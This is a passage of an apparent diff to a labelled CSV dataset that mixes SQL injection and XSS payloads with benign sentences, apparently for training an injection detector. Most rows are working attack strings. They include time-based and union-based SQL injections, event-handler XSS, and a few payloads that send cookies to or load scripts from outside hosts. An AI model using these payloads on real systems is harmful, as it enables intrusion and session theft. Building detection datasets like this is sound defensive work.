0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,17279 -1' ) ) ) and 8162 = 1687 and ( ( ( 'tdyr' like 'tdyr,2,SQLi,20070 -SLEEP(5)--,2,SQLi,10867 -<strong id=x tabindex=1 onfocus=alert(1)></strong>,1,XSS,4463 -Insert the fresh cartridge.,0,normal,22941 -x' AND members.email IS NULL; --,2,SQLi,10139 -Select the right shade of lipstick.,0,normal,24275 -"<ins onmouseup=""alert(1)"">test</ins>",1,XSS,8221 -"1' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( 'wdru' like 'wdru",2,SQLi,14254 -"<style>@keyframes x{}</style><figcaption style=""animation-name:x"" onanimationstart=""alert(1)""></figcaption>",1,XSS,6174 -"<noframes onmouseout=""alert(1)"">test</noframes>",1,XSS,7749 -"1' or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and 'zpyx' = 'zpyx",2,SQLi,19621 -if ( 7427 = 7800 ) select 7427 else drop function dgir--,2,SQLi,16075 +"<strike oncopy=""alert(1)"" contenteditable>test</strike>",1,XSS,6309 +declare @s varchar ( 200 ) select @s = 0x73656c6 ...,2,SQLi,11366 +"<source onbeforecut=""alert(1)"" contenteditable>test</source>",1,XSS,7154 +Where's the SQL code?,0,normal,23341 +Locate items where valid.,0,normal,23289 +"<address draggable=""true"" ondrag=""alert(1)"">test</address>",1,XSS,3529 +1'+ ( select 'yyyn' where 5395 = 5395,2,SQLi,21625 +"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and 'hvqt' = 'hvqt",2,SQLi,18732 +"-1772 ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 8904 = 8904",2,SQLi,19950 +-9509' ) ) ) or 1091 = 5477 and ( ( ( 'gsmz' = 'gsmz,2,SQLi,16376 +1' or sleep ( 5 ),2,SQLi,18196 +"<script onmouseout=""alert(1)"">test</script>",1,XSS,6889 +"<center onmouseout=""alert(1)"">test</center>",1,XSS,2642 +"<img src=""javascript:alert(1)"">",1,XSS,218 +Delete the old emails from your inbox.,0,normal,22879 +"-5606 ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,15231 +-9202' where 9799 = 9799 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,12833 +"';!--\""&lt;XSS&gt;=&{()}",1,XSS,1062 +1' ) ) and 7230 = 2517,2,SQLi,17881 +"1"" ) union all select null,null,null,null,null,null#",2,SQLi,19719 +"""a"""" or 3 = 3--""",2,SQLi,11994 +"""I don't think they will select me again,"" he said, laughing.",0,normal,26415 +"-5776%' union all select 3075,3075,3075,3075,3075--",2,SQLi,14613 +Where's the fair?,0,normal,23553 +<td onpointerdown=alert(1)>XSS</td>,1,XSS,2753 +<input type=image src=1 onerror=alert(1)>,1,XSS,1685 +<article onpointerout=alert(1)>XSS</article>,1,XSS,8106 +"select * from users where id = 1 union select 1||1,version ( ) -- 1",2,SQLi,11338 +"1' ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 'bvdw' = 'bvdw",2,SQLi,13550 +"1' ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,12394 +<head onblur=alert(1) tabindex=1 id=x></head><input autofocus>,1,XSS,7781 +"1 ) as khkv where 2944 = 2944 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,15632 +"<svg onpaste=""alert(1)"" contenteditable>test</svg>",1,XSS,6064 +from,0,normal,26471 +"<marquee draggable=""true"" ondragend=""alert(1)"">test</marquee>",1,XSS,7607 +Find data where valid.,0,normal,23297 +select ( case when ( 9667 = 6212 ) then 9667 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13448 +"1%"" or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,17758 +"`'><script>\xE2\x80\x88javascript:alert(510)</script> +`'><script>\xE2\x80\x89javascript:alert(1)</script>",1,XSS,8929 +1 where 2239 = 2239 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --,2,SQLi,18452 +"<tr onmouseup=""alert(1)"">test</tr>",1,XSS,5533 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23 ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20-- ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23 +'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* +'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20-- +'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23 ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*",2,SQLi,22489 +"-2605%' ) ) ) union all select 4738,4738#",2,SQLi,16604 +1 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ),2,SQLi,12504 +"1' ) where 1577 = 1577 union all select null,null,null,null,null,null#",2,SQLi,12806 +"</TITLE><SCRIPT>alert("""");</SCRIPT>",1,XSS,7673 +The company began testing pickup at select locations starting last summer.,0,normal,25435 +"<div draggable=""true"" contenteditable>drag me</div><ul ondrop=alert(1) contenteditable>drop here</ul>",1,XSS,4602 +"union (select NULL, NULL, (select @@version)) --",2,SQLi,9988 +"<style>@keyframes x{}</style><base style=""animation-name:x"" onanimationstart=""alert(1)""></base>",1,XSS,3704 +"<style>@keyframes x{}</style><template style=""animation-name:x"" onanimationstart=""alert(1)""></template>",1,XSS,5658 +Select study.,0,normal,24685 +Select the perfect accessory for your outfit.,0,normal,24147 +Where's the stadium?,0,normal,23504 +"><script+src=https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)""></script>",1,XSS,9758 +"1' ) ) as kdwc where 5906 = 5906 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,14855 +"<header onkeypress=""alert(1)"" contenteditable>test</header>",1,XSS,3866 +<IMG SRC=jAVasCrIPt:alert(‘XSS’)>,1,XSS,881 +"When you select the computer that seems to fit your needs, you'll find detailed reviews and information about what other customers bought when they purchased the computer you're considering.",0,normal,25107 +-5880' ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'rwgl' = 'rwgl,2,SQLi,19402 +<span id=x tabindex=1 ondeactivate=alert(1)></span><input id=y autofocus>,1,XSS,8764 +<svg><strong onload=alert(1)></strong>,1,XSS,2436 +"1'+ ( select sged where 1181 = 1181 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) ) +'",2,SQLi,21482 +"<center onbeforecut=""alert(1)"" contenteditable>test</center>",1,XSS,6217 +-3846%' or 6872 = 6872 and '%' = ',2,SQLi,22312 +AS INJECTX WHERE 1=1 AND 1=1#,2,SQLi,10127 +<ul id=x tabindex=1 onactivate=alert(1)></ul>,1,XSS,3941 +"1"" where 8241 = 8241 union all select null,null,null#",2,SQLi,14306 +"1"" ) ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( ""xnsj"" like ""xnsj",2,SQLi,12464 +<nobr onpointerover=alert(1)>XSS</nobr>,1,XSS,5450 +"or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,12017 +-4803%' ) ) or 8571 = 8571--,2,SQLi,18858 +"<q onmousemove=""alert(1)"">test</q>",1,XSS,2282 +"<style>@keyframes slidein {}</style><datalist style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></datalist>",1,XSS,3170 +"1 ) as drbw where 2380 = 2380 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,18899 +select ( case when ( 5085 = 4259 ) then 5085 else 5085* ( select 5085 from mysql.db ) end ) #,2,SQLi,20796 +Sort beads.,0,normal,23019 +"1 ) where 1415 = 1415 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --",2,SQLi,18125 +"1"" ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,14674 +"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ""vabm"" = ""vabm",2,SQLi,13361 +"1"" ) ) as yutu where 1306 = 1306 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --",2,SQLi,19000 +"Buy 1, get 1 free* on select Nature Made® vitamins.",0,normal,26257 +"&lt;IMG LOWSRC=\""javascript&#058;alert('XSS')\""&gt;",1,XSS,934 +<main onpointerout=alert(1)>XSS</main>,1,XSS,8133 +-5389'|| ( select 'gggl' where 1020 = 1020 union all select 1020#,2,SQLi,19697 +<x onxxx=alert(1) 1=',1,XSS,9304 +"<a href=""\xE3\x80\x80javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,504 +<select onpointermove=alert(1)>XSS</select>,1,XSS,6129 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><canvas id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></canvas>",1,XSS,7477 +"1"" ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,13749 +"<div draggable=""true"" contenteditable>drag me</div><hr ondragover=alert(1) contenteditable>drop here</hr>",1,XSS,7164 +"-9997' union all select 9347,9347,9347,9347,9347,9347,9347,9347#",2,SQLi,15261 +"-4068' ) ) ) union all select 9491,9491,9491--",2,SQLi,16489 +"1 ) ) as vzgo where 6281 = 6281 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,19787 +"<svg onmouseenter=""alert(1)"">test</svg>",1,XSS,8736 +"1 ) ) or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,20296 +"<div id=""134""><xmp>",1,XSS,9069 +"<a href="" javascript:alert(1)"">XSS</a>",1,XSS,148 +"<script src=""\\example.com\foo.js""></script> // Safari 5.0//[""'`-->]]>]</div>",1,XSS,9200 +""" ) ) ;waitfor delay '0:0:__TIME__'--",2,SQLi,11920 +"1"" where 3764 = 3764",2,SQLi,12990 +"1"" ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ""auyv"" = ""auyv",2,SQLi,15294 +Select the right color for the walls.,0,normal,24181 +"<xmp onmouseenter=""alert(1)"">test</xmp>",1,XSS,4366 +"1' ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( 'xpks' like 'xpks",2,SQLi,19351 +"<font draggable=""true"" ondragenter=""alert(1)"">test</font>",1,XSS,6068 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--",2,SQLi,10871 +![a](javascript:prompt(document.cookie))\,1,XSS,9357 "<IMG SRC=x onemptied=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1177 -"<div draggable=""true"" contenteditable>drag me</div><dir ondrop=alert(1) contenteditable>drop here</dir>",1,XSS,8224 -"-5640"" ) ) or 9792 = 2728--",2,SQLi,18605 -"{""id"":null,""firstName"":""Gabriel"",""lastName"":""Chen"",""address"":""11 Unity St #01-11"",""city"":""537"",""telephone"":""384249778""}",0,normal,26052 -"1 ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( 8554 = 8554",2,SQLi,14244 -"<div draggable=""true"" contenteditable>drag me</div><menu ondrop=alert(1) contenteditable>drop here</menu>",1,XSS,4817 -onRepeat,1,XSS,9699 -"<colgroup draggable=""true"" ondrag=""alert(1)"">test</colgroup>",1,XSS,5551 -select ( case when ( 4341 = 7041 ) then 4341 else 4341* ( select 4341 from mysql.db ) end ) #,2,SQLi,16875 --8028%' ) ) ) or 5042 = 5214,2,SQLi,20341 -"<footer onkeydown=""alert(1)"" contenteditable>test</footer>",1,XSS,7885 -"<content oncut=""alert(1)"" contenteditable>test</content>",1,XSS,2215 -"<hr draggable=""true"" ondrag=""alert(1)"">test</hr>",1,XSS,7794 -"-8215%"" ) union all select 3877,3877,3877,3877,3877,3877--",2,SQLi,16316 -"<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//[""'`-->]]>]</div>",1,XSS,9189 -"-5275%' ) ) union all select 9382,9382,9382,9382,9382,9382,9382,9382,9382,9382--",2,SQLi,20992 -They select the best candidates.,0,normal,24643 -"-8772%"" ) union all select 5433,5433,5433,5433,5433,5433,5433,5433,5433,5433--",2,SQLi,17105 -some,0,normal,23367 -"<object data=""javascript:alert()"">",1,XSS,2087 -"1 where 5929 = 5929 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12816 -"<col onmousemove=""alert(1)"">test</col>",1,XSS,7252 -"1"" ) ) as jucs where 6836 = 6836",2,SQLi,18251 -Select post.,0,normal,24884 -"1%"" ) ) ) and 1594 = 8757",2,SQLi,20930 -"1' ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'lxoc' = 'lxoc",2,SQLi,18859 -"<html><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>""></BODY></html>",1,XSS,1465 -<rb onpointerover=alert(1)>XSS</rb>,1,XSS,6217 -"{""id"":null,""firstName"":""Hung"",""lastName"":""Tan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25686 -level,0,normal,23411 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i",2,SQLi,11152 -1 ) as hlcn where 1165 = 1165 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,13167 -"<caption onmouseup=""alert(1)"">test</caption>",1,XSS,2183 -"1 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,15596 -"<style>:target {color: red;}</style><samp id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></samp>",1,XSS,4973 -index,0,normal,23304 -"1"" ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,14934 -""" ) or ( ""x"" ) = ( ""x",2,SQLi,12045 -Select your competition.,0,normal,25103 -<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>,1,XSS,863 -"<style>@keyframes x{}</style><script style=""animation-name:x"" onanimationstart=""alert(1)""></script>",1,XSS,7406 -http://1113982867/,1,XSS,3275 -"-1048%"" or 3038 = 3038",2,SQLi,14588 +"Select ""Devices,"" and then ""Bluetooth Devices"" from the Settings menu.",0,normal,25642 +"<embed src=""data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="">",1,XSS,1076 +"<link oncopy=""alert(1)"" contenteditable>test</link>",1,XSS,4572 +<var id=x tabindex=1 ondeactivate=alert(1)></var><input id=y autofocus>,1,XSS,7303 +"<aside onmouseover=""alert(1)"">test</aside>",1,XSS,7404 +"1"" ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( ""zoag"" like ""zoag",2,SQLi,21491 +Select from the list of available skins the one you wish to use.,0,normal,25590 +"<kbd draggable=""true"" ondragleave=""alert(1)"">test</kbd>",1,XSS,8022 +1) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337,2,SQLi,11263 +Fetch records where available.,0,normal,23281 +"1"" ) as wmng where 5976 = 5976",2,SQLi,15579 +"1 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) )",2,SQLi,21721 +Where's the house?,0,normal,23529 +"1%"" ) and ( 6016 = 4763 ) *4763 and ( ""%"" = """,2,SQLi,12245 +<content id=x tabindex=1 onbeforeactivate=alert(1)></content>,1,XSS,5346 +1' order by 1#,2,SQLi,12404 +1'+ ( select 'mquh' where 3933 = 3933,2,SQLi,14367 +select case when 6558 = 4327 then 1 else null end--,2,SQLi,12082 +Select your inspect.,0,normal,24961 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23 ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/* ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20-- ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23 +'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/* +'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20-- +'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23 ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*",2,SQLi,22501 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4",2,SQLi,10310 +"<bgsound draggable=""true"" ondragleave=""alert(1)"">test</bgsound>",1,XSS,6922 +"-3393"" ) ) union all select 5954,5954,5954,5954,5954,5954,5954,5954,5954,5954--",2,SQLi,19115 +"-2071 union all select 4753,4753--",2,SQLi,13689 +"<a href=http://foo.bar/#x=`y></a><img alt=""`><img src=x:x onerror=javascript:alert(1)></a>"">",1,XSS,644 +"1%' ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,19392 +"<style>:target {color:red;}</style><video id=x style=""transition:color 1s"" ontransitionend=alert(1)></video>",1,XSS,7756 +"1"" where 7279 = 7279 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,20442 +"admin"") or (""1""=""1""#",2,SQLi,9900 +"<meta content=""&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)"" http-equiv=""refresh""/>",1,XSS,309 +"select * from users where id = 1 or ""& ( "" or 1 = 1 -- 1",2,SQLi,11314 +"1"" ) where 3507 = 3507",2,SQLi,14740 +1%' ) ) and 3721 = 2597#,2,SQLi,21034 +"<style>@keyframes x{}</style><rp style=""animation-name:x"" onanimationstart=""alert(1)""></rp>",1,XSS,8461 +<video><source onerror=location=/\02.rs/+document.cookie>,1,XSS,136 +"1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 )",2,SQLi,19259 +1' or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and 'bwtk' = 'bwtk,2,SQLi,18655 +"<ol oncontextmenu=""alert(1)"">test</ol>",1,XSS,6293 +"<svg><use href=""data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x"" />",1,XSS,165 +1' ) waitfor delay '0:0:5'--,2,SQLi,19657 +1'|| ( select 'dsjg' where 2402 = 2402 and 1947 = 7472--,2,SQLi,19932 +"<output onbeforecopy=""alert(1)"" contenteditable>test</output>",1,XSS,8780 +"-2434' ) ) ) union all select 5509,5509,5509,5509,5509,5509,5509--",2,SQLi,16595 +"<style>:target {color: red;}</style><span id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></span>",1,XSS,2562 +Select your objective.,0,normal,24810 +"1"" ) as oijn where 1521 = 1521 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,22229 +"1'+ ( select 'midn' where 2819 = 2819 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) ) +'",2,SQLi,17711 +1' or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,14544 +"<style>@keyframes x{}</style><tt style=""animation-name:x"" onanimationend=""alert(1)""></tt>",1,XSS,5253 +"<style>@keyframes slidein {}</style><ins style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></ins>",1,XSS,1809 +"1%"" ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ""%"" = """,2,SQLi,15602 +Find entries where necessary.,0,normal,23317 +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;,1,XSS,1389 +"1%"" union all select null,null,null,null,null,null,null#",2,SQLi,13079 +"1"" ) ) and 4595 = 4595#",2,SQLi,18957 +"1' ) ) as oocd where 2919 = 2919 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,18008 +Select the perfect match.,0,normal,24293 +Insert contact.,0,normal,23030 +"1%"" union all select null,null,null--",2,SQLi,15357 +"Having been ordained in 1833, he undertook college and university work successfully, and in 1839 was appointed select preacher at Whitehall.",0,normal,26086 +<html ontouchend=alert(1)>,1,XSS,9130 +"<style>:target {color: red;}</style><listing id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></listing>",1,XSS,8814 +"<listing onkeyup=""alert(1)"" contenteditable>test</listing>",1,XSS,4654 +"-3747"" ) union all select 8962,8962,8962,8962,8962#",2,SQLi,21691 +( select ( case when ( 6714 = 8872 ) then 1 else 6714* ( select 6714 from master..sysdatabases ) end ) ),2,SQLi,20494 +select * from users where id = 1 %!<1 or 1 = 1 -- 1,2,SQLi,11400 +"<style>:target {color: red;}</style><th id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></th>",1,XSS,3821 +"Fortnite servers are really bad today / today. Problems with double / squad usage and problems with dating... I have not seen anything from Epic or Fortnite, but if you have problems with loading, try to select the game mode and try again!",0,normal,26457 +<button onResize=javascript:alert(1)>,1,XSS,9619 +"<samp onmouseleave=""alert(1)"">test</samp>",1,XSS,2800 +"<video autoplay controls onvolumechange=alert(1)><source src=""validvideo.mp4"" type=""video/mp4""></video>",1,XSS,6424 +"-1366' or make_set ( 9354 = 9354,7185 ) and 'abre' = 'abre",2,SQLi,17390 +<ol onpointerup=alert(1)>XSS</ol>,1,XSS,7780 +"<s onmouseup=""alert(1)"">test</s>",1,XSS,8701 +<dialog id=x tabindex=1 onfocusin=alert(1)></dialog>,1,XSS,8352 +"1%"" ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,15779 +"<style>:target {color:red;}</style><sub id=x style=""transition:color 1s"" ontransitionend=alert(1)></sub>",1,XSS,6988 +Where's the perfect spot to capture memories?,0,normal,23819 +&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;,1,XSS,1363 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- ++if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,22508 +"<progress draggable=""true"" ondragleave=""alert(1)"">test</progress>",1,XSS,7603 +<head onpointerover=alert(1)>XSS</head>,1,XSS,5415 +"1"" where 4213 = 4213 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,16448 +1' ) as hcpp where 1863 = 1863,2,SQLi,17980 +1%' ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( '%' = ',2,SQLi,18132 +-8636' ) ) ) or 4301 = 7212--,2,SQLi,20983 +"1"" ) ) as rhea where 2982 = 2982 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --",2,SQLi,20272 +"-5231%"" or 4945 = 8402#",2,SQLi,21867 +"-4571' union all select 3227,3227,3227,3227--",2,SQLi,13100 +"<mark onmouseup=""alert(1)"">test</mark>",1,XSS,6443 +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",1,XSS,9501 +"<!--<img src=""--><img src=x onerror=alert(1)//"">//INJECTX",1,XSS,9813 +"1%' or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,20899 +[citelol]: (javascript:prompt(document.cookie)),1,XSS,9364 +select ( case when ( 3863 = 1151 ) then 3863 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,12657 +"1"" ) as lrew where 6067 = 6067 union all select null,null,null,null,null,null,null#",2,SQLi,15192 +But then it was time to select a foreign leader.,0,normal,26259 +AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC),2,SQLi,10632 +"1 where 8333 = 8333 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,15939 +Create a beautiful melody.,0,normal,22546 +"-7482"" ) ) ) or 9077 = 2651",2,SQLi,18227 +"<section onkeyup=""alert(1)"" contenteditable>test</section>",1,XSS,6951 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><image id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></image>",1,XSS,6758 +"select * from users where id = 1 or "" ( ["" or 1 = 1 -- 1",2,SQLi,11629 +"You simply click ""Select > Subject"" and Photoshop will do the rest.",0,normal,25033 +-4208%' ) ) ) or 1133 = 9010--,2,SQLi,21472 +"1%' ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( '%' = '",2,SQLi,18519 +"><script+src=https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()""></script>",1,XSS,9768 +1' where 5547 = 5547,2,SQLi,21710 +1' ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ( 'ugrk' = 'ugrk,2,SQLi,21109 +<rb onpointermove=alert(1)>XSS</rb>,1,XSS,3800 +<source id=x tabindex=1 onfocus=alert(1)></source>,1,XSS,6382 +"<bgsound draggable=""true"" ondragend=""alert(1)"">test</bgsound>",1,XSS,6282 +"<style>@keyframes x{}</style><wbr style=""animation-name:x"" onanimationstart=""alert(1)""></wbr>",1,XSS,6663 +1 rlike sleep ( 5 ) # urxh,2,SQLi,18394 +"1%"" ) rlike sleep ( 5 ) and ( ""%"" = 